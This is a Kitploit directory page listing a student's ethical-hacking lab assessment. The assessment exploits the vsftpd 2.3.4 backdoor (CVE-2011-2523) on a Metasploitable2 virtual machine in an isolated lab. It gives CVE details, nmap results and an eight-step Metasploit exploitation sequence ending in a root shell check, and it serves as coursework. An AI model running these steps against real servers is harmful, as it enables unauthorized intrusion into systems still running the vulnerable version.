Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ethical-hacking-CVE-2011-2523 — 道德黑客评估 | 使用 Kali Linux 和 Metasploit 对 Metasploitable2 上的 vsftpd 2.3.4 后门(CVE-2011-2523)进行实际漏洞测试 | Kitploit
工具/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
漏洞分析漏洞利用CTF渗透测试学习与教育实验室与实践
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

道德黑客评估 | 使用 Kali Linux 和 Metasploit 对 Metasploitable2 上的 vsftpd 2.3.4 后门(CVE-2011-2523)进行实际漏洞测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
74个月前尚未审核
分享

道德黑客 | 评估 1

实际漏洞测试 - CVE-2011-2523 (vsftpd 2.3.4 后门)

模块: - 道德黑客 大学: 伦敦城市大学 课程: 网络安全与取证科学荣誉学士

法律免责声明

所有活动仅在受控的隔离虚拟实验室中进行,仅供教育目的。没有针对真实世界的系统。所有工作均遵守1990年《计算机滥用法》。

实验室环境

  • 攻击机操作系统:Kali Linux (主机)
  • 攻击机 IP:192.168.56.1 (vboxnet0)
  • 靶机虚拟机:Metasploitable2
  • 靶机 IP:192.168.56.103
  • 虚拟机管理程序:Oracle VirtualBox
  • 网络模式:仅主机 (vboxnet0)

所选CVE - CVE-2011-2523

  • CVE ID:CVE-2011-2523
  • 受影响软件:vsftpd 2.3.4
  • 受影响端口:21/tcp (FTP)
  • CVSS v3评分:9.8 严重
  • 攻击向量:网络
  • 所需权限:无
  • 参考来源:https://nvd.nist.gov/vuln/detail/CVE-2011-2523

Nmap 扫描结果

端口 21/tcp - vsftpd 2.3.4 (目标) 端口 22/tcp - OpenSSH 4.7p1 端口 23/tcp - Linux telnetd 端口 80/tcp - Apache httpd 2.2.8 端口 139/tcp - Samba smbd 3.X 端口 445/tcp - Samba smbd 3.X 端口 3306/tcp - MySQL 5.0.51a 端口 6667/tcp - UnrealIRCd

利用总结

步骤 1: nmap -sn 192.168.56.0/24 步骤 2: nmap -sV 192.168.56.103 步骤 3: msfconsole 步骤 4: use exploit/unix/ftp/vsftpd_234_backdoor 步骤 5: set RHOSTS 192.168.56.103 步骤 6: set LHOST 192.168.56.1 步骤 7: run 步骤 8: id && whoami

参考文献

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
下载工具